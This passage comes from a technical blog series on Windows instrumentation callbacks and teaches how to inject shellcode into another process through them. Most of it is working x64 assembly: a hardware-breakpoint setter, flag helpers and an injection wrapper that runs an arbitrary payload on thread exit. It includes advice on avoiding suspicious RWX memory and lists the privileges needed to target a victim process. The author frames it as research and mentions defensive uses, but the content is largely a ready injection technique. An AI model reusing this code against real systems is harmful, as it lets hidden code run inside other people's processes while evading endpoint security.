As can be seen, a null-terminated “calc” string is pushed onto the stack and used as an argument to a call to 0x7fffffffffffffff after the stack was aligned (RSP % 0x10 = 0).
But why are we using 0x7fffffffffffffff as a call target? We aren’t, we are simply using it as a placeholder. ASLR changes the memory address of, among other things, WinExec. This means, WinExec’s address isn’t known at compile time. There are two solutions for this:
- We add a dynamic resolution function to the shellcode with, for example, a PEB walk.
- We abuse the fact that ntdll, kernel32 and kernelbase (the DLLs we will require) have the same base address in all processes, as it only gets changed on a reboot. This means, the address of WinExec in the injector is the same as in the process to inject into.
In this case we utilize option 2 to keep the shellcode small. Using a search function, 0x7fffffffffffffff will be replaced before it is injected into the other process to update it to its correct address. This is possible because, as mentioned, we copy the assembled bytes of the assembly code to an array, meaning the required bytes are not in R-X memory but in RW-. This could of course also be rewritten so that it reads in a payload instead of having it hard-coded.
The payload can be anything, as long as it considers the following restrictions:
- Needs to be position-independent
- Needs to properly restore the stack after execution or terminate its own thread
Payload wrapper
So, what does the payload wrapper need to include? Everything to correctly set up the payload execution, in other words all the IC logic. First off, we don’t want our payload to execute multiple times, so in our example have multiple calculators pop up. That means, if we don’t want to unregister our IC after execution, we need a flag to signal when the payload was already executed. As the payload should execute once in the entire process and not once every thread, we will need a process-wide flag. We will implement a process-wide flag and not unregister the IC, as we can’t spoon-feed you everything 😉
Also, as mentioned, we will be setting a hardware breakpoint on a thread exit (RtlExitUserThread). It would be very inefficient if we set the hardware breakpoint again and again on every IC call. So, we will also need a thread-local flag to signal when the breakpoint was set, so this step will be skipped on all following IC calls from that thread.
The injected IC should execute the following rough pseudo-code logic:
bool payload_executed = false bool thread_set_hardware_bp = false callback(void* ic_origin) { if (!payload_executed && !thread_set_hardware_bp) { thread_set_hardware_bp = true if (!set_hwbp(RtlExitUserThread)) // Does syscall thread_set_hardware_bp = false return } if (!is_exception(ic_origin)) return if (exception_origin != RtlExitUserThread) return remove_hwbp(RtlExitUserThread) // Does syscall if (!payload_executed) { payload_executed = true execute_payload() // (Most likely) does syscall } restore_context() } |
In the previous posts we used a flag to avoid recursion; in this case we don’t need a second thread flag. The only way for a syscall to happen if the exception doesn’t come from our breakpoint is through set_hwbp, which is why the flag is enabled before the function call and unset if the breakpoint wasn’t set successfully.
This means, GetThreadContext and SetThreadContext, the two functions issuing a syscall down the line, trigger the IC again but since they aren’t the expected exception they just return from the IC.
A process-local flag can be set by allocating memory with read and write permissions and using a certain address as a flag. As we want to avoid any RWX memory allocations, we will need two memory regions with different permissions: RW- for the flag and R-X for the code itself. RWX allocations should be avoided due to them being highly suspicious. This causes another issue: the flag address can’t be known at runtime due to being dynamically allocated. If we allocated the memory for the flag from inside the executable code that was written to the victim process, we would only have the address of the flag in the same IC call in which the flag was allocated, due to the memory region being not writable, so we couldn’t store it.
Our solution for this is to use a placeholder address for the flag such as with the WinExec address in the payload. The injector first allocates the memory for the flag and then searches for the placeholder inside the compiled wrapper that was written to an array through prebuild steps, replaces it with the address of the allocated memory and only then writes the wrapper to the victim process.
Setting a hardware breakpoint
As mentioned, we will use the same hooking technique used in the previous blog post to hook RtlExitUserThread, just that this time we will need to inject that code into the other process meaning it needs to be position-independent shellcode instead of a regular C++ function. This does not only apply to setting the hardware breakpoint but all the code that needs to get injected. As this is a bunch of assembly instructions, let’s start by writing the helper functions before the core execution logic.
The following code basically does the following:
bool set_dr(DWORD64 bp_address, bool enable) { CONTEXT context = { .ContextFlags = CONTEXT_DEBUG_REGISTERS }; GetThreadContext(GetCurrentThread(), &context); context.Dr3 = bp_address; context.Dr7 |= 1ULL << 6; SetThreadContext(GetCurrentThread(), &context); } |
Approximately this can be done with the following code; we just hard-coded the usage of Dr3 for no specific reason. You could of course also use other debug registers or add the possibility to add all of them.
; rcx = breakpoint address ; rdx = Enable (1) / Disable (0) ; Return: Rax != 0 = success ; RSP needs to be aligned set_dr: ; Save used registers push r14 push r13 push rdi push rbx mov r13, rcx mov rbx, rdx sub rsp, 0x4d8 ; Size of CONTEXT struct + 8 alignment mov rdi, rsp ; CONTEXT base mov r14, rdi ; rep stosq changes rdi, this is backup ; Zero CONTEXT struct mov rcx, 0x9a ; (4d0 / 8) --> amount of uint64_t's xor rax, rax rep stosq ; CONTEXT_DEBUG_REGISTERS mov dword [r14 + 0x30], 0x00100010 ; GetCurrentThread() == -2 xor rcx, rcx dec rcx dec rcx ; The saved CONTEXT base mov rdx, r14 ; Shadow space sub rsp, 0x20 ; GetThreadContext placeholder mov rdi, 0x6CCCCCCCCCCCCCCC call rdi add rsp, 0x20 ; Shadow space ; if return value == 0 it errored test rax, rax jz _set_dr_ret ; Set Dr3 mov qword [r14 + 0x60], r13 ; offsetof(CONTEXT, Dr7) = 0x70 mov rcx, [r14 + 0x70] ; Clear Dr3 specific bits and rcx, ~((3 << 16) | (3 << 18) | (1 << 6)) test rbx, rbx jz _skip_enable_bp ; Set local Dr3 enable (Execution type execute = 0 & length needs to be 0) or rcx, (1 << 6) _skip_enable_bp: ; Dr7 = new Dr7 mov [r14+0x70], rcx ; SetThreadContext xor rcx, rcx dec rcx dec rcx mov rdx, r14 ; Shadow space sub rsp, 0x20 ; GetThreadContext placeholder mov rdi, 0x5CCCCCCCCCCCCCCC call rdi add rsp, 0x20 ; Shadow space _set_dr_ret: add rsp, 0x4d8 ; + 8 alignment pop rbx pop rdi pop r13 pop r14 ret |
Flag helper functions
For the process-wide flag, we will use a placeholder (0x2CCCCCCCCCCCCCCC), which will be replaced at runtime. For the thread-local one, we will again use the Thread Environment Block. There are more unsuspicious ways of doing this.
load_bp_set_ptr_into_rcx: ; TEB mov rcx, gs:[30h] ; TEB->InstrumentationCallbackDisabled add rcx, 1b8h ret load_bitflag_into_rcx: ; rcx = pointer bit flag (placeholder currently) mov rcx, 0x2CCCCCCCCCCCCCCC ret |
Execution logic
Looking back at the pseudo code, we got set_hwbp and remove_hwbp covered and now also got access to the two flag variables through the helper functions, so let’s get to implementing the core logic. I didn’t mention one requirement in the pseudo code: stack alignment. Callbacks aren’t always guaranteed to be aligned (RSP % 0x10 != 0, sometimes RSP % 0x10 = 8). To avoid issues, we are manually aligning the stack so all Windows API calls and also the payload call is 16 bytes aligned. So that the stack can be properly restored, we aren’t simply overwriting RSP but instead push a placeholder to check when returning if the stack was adjusted.
entry: ; The actual return address of the IC push r10 push r14 mov r14, rsp add r14, 0x10 push rax push rcx push rdx ; Rsp should be aligned for both cases, so it’s done here mov rdx, rsp and dl, 0xF cmp dl, 0x8 jne _skip_align mov rdx, 0xDEADBEEF push rdx _skip_align: call load_bp_set_ptr_into_rcx xor rax, rax cmp [rcx], rax je _hwbp_is_set ; “is_exception” check and payload execution _hwbp_is_set: ; […] _ret_unalign: ; Unalign rsp if it was previously modified cmp dword [rsp], 0xDEADBEEF jne _ret add rsp, 8 _ret: pop rdx pop rcx xor rcx, rcx pop rax pop r14 ; r10 still on top of stack à return to it ret |
First execution
To follow the execution flow logically, let’s first cover what happens when an IC is first triggered in a thread (_first_execution_in_thread). Let’s look at the relevant excerpt from the pseudo code:
[…] if (!payload_executed && !thread_set_hardware_bp) { thread_set_hardware_bp = true if (!set_hwbp(RtlExitUserThread)) // Does syscall thread_set_hardware_bp = false return } […] |
The first line of this pseudo code was already partially written in the execution logic chapter. Only the first part of the if statement, whether the payload was executed or not, is missing. In addition to checking that, we need to set the flag that the hardware breakpoint was set to not call the IC recursively. If setting the HWBP wasn’t successful, the flag should be unset.
As we already wrote our helper functions to retrieve the flag addresses and set a breakpoint, this is simply a matter of combining things:
_hwbp_is_set: call load_bitflag_into_rcx xor rax, rax inc rax ; Was payload already executed? If yes, don’t set BP cmp [rcx], rax je _ret_unalign ; Set BP set flag to avoid recursion call load_bp_set_ptr_into_rcx xor rax, rax inc rax ; bp set flag = 1 mov [rcx], rax ; RtlExitUserThread placeholder mov rcx, 0x3CCCCCCCCCCCCCCC xor rdx, rdx inc rdx ; Enable hwbp call set_dr ; Failed (rax != 0)? test rax, rax jnz _ret_unalign ; bp set flag = 0 to retry on the next IC trigger call load_bp_set_ptr_into_rcx xor rax, rax mov [rcx], rax ; Fall through on purpose to return _ret_unalign ; […] |
After HWBP was set
Let’s look back at the pseudo code for all this to function. We already wrote the code for the first execution within a thread and the logic to set a HWBP. All that’s left to do now is the following excerpt from the pseudo code:
bool payload_executed = false bool thread_set_hardware_bp = false callback(void* ic_origin) { […] if (!is_exception(ic_origin)) return if (exception_origin != RtlExitUserThread) return remove_hwbp(RtlExitUserThread) // Does syscall if (!payload_executed) { payload_executed = true execute_payload() // (Most likely) does syscall } restore_context() } |
We already implemented most of the required logic in the second part of this series – just in C++. If you are unsure how to detect whether the IC was triggered by a HWBP and how to restore execution after a HWBP was triggered, we recommend reading the second part of this series again and then returning to this point. We will, for example, not again explain how we know that we need to intercept KiUserThreadExceptionDispatcher.
Alright, back to coding:
; […] ; Check if the hardware breakpoint was triggered ; KiUserThreadExceptionDispatcher placeholder mov rcx, 0x4CCCCCCCCCCCCCCC cmp r10, rcx jne _ret_unalign ; r14 is still the top of the original stack ; this should be a CONTEXT*, if it is a nullptr its bad :) test r14, r14 jz _ret_unalign ; Exception thrown, but is it ours? ; RtlExitUserThread placeholder mov r10, 0x3CCCCCCCCCCCCCCC mov rcx, [r14+0xf8] cmp r10, rcx ; Not our exception jne _ret_unalign ; Unset bp xor rcx, rcx xor rdx, rdx call set_dr call load_bitflag_into_rcx ; Save context base push r14 ; payload was already executed cmp qword [rcx], 1 je _restore_context ; Set payload executed flag mov qword [rcx], 1 sub rsp, 0x20 call payload add rsp, 0x20 ; as you can see, the payload needs to not mangle the stack ; otherwise it should call RtlExitUserThread itself ; if it mangled the stack rcx wouldn’t be the context base in the next line _restore_context: ; Restore context base to rcx pop rcx ; Set ResumeFlag in EFlags register or dword [rcx+0x44], 0x10000 ; ExceptionRecord = nullptr xor rdx, rdx ; Call RtlRestoreContext sub rsp, 0x20 mov rdi, 0x8CCCCCCCCCCCCCCC call rdi ; RtlRestoreContext doesn’t return |
If you were a careful reader and/or followed along and tried to assemble the code yourself, you might’ve noticed that the ‘payload’ label is missing. Where does it come from? Easy, we just added the payload label at the end of all our code to use a relative reference. That way we can just add the payload to the end of the payload wrapper and it will be able to execute the payload, even if the payload and the wrapper were assembled separately and the byte arrays were just added to each other.
If you made it this far and understood what we were doing, congrats! You’ve pulled through, now we can finally transition back to C++.
C++ code
If you followed our recommendation of using CMake/a build system with prebuild steps to assemble the assembly for you and transform it to a byte array, you should most likely have two arrays now: one for your payload and one for the wrapper. If you only got one fixed payload you always want to use after compilation, you could of course also directly assemble both the payload and the wrapper together or directly copy them together with prebuild steps.
Now you need to replace the placeholders in that/those byte arrays. You could of course also add a PEB walk to dynamically retrieve the required function addresses and not use placeholders; we decided against this for our wrapper for size reasons and to keep the blog post brief.
Talking about that, the blog post is already pretty long so we’ve decided to not add any of our C++ code 😉. If you understood the blog series so far, searching for 8-byte numbers in a byte array and replacing them should be an easy task for you. If you go through the assembly again, you will need to replace the placeholders 0x2CCCCCCCCCCCCCCC till 0x8CCCCCCCCCCCCCCC. The placeholders are commented with what function they require. The flag placeholder simply requires a 1-byte allocation with read and write permissions in the target process.
After replacing the placeholders and adding them to one array/vector, that data needs to be written to an executable memory region in the victim process. For this, obviously an opened handle is required that allows memory writing and memory allocations if any allocations are done. After the shellcode was copied over, an IC needs to be set on the other process with the callback being specified as the start of the copied shellcode. For this, a handle with the PROCESS_SET_INFORMATION access mask is required. Keep in mind that you require the SeDebugPrivilege to set an IC onto another process. You can, for example, start your program from an administrative PowerShell.
Closing words
In this blog post you learned how to write the shellcode required to inject shellcode into another process with ICs. You hopefully also managed to write the required C++ code yourself. This is of course not the only way to utilize ICs for injections. To my knowledge ICs are the most powerful feature of Windows usable in user mode. In general, we only covered a fraction of what is possible with ICs, for example we haven’t covered getting callbacks to APCs with them.
ICs aren’t only usable in offensive ways though; they are, for example, also very interesting for EDRs and anti-cheats.
Three parts of this series were about mainly offensive use cases of ICs. In the next and last part of this series, we will discuss ICs from a more defensive standpoint: how they can be detected and how to detect if someone overwrote your IC.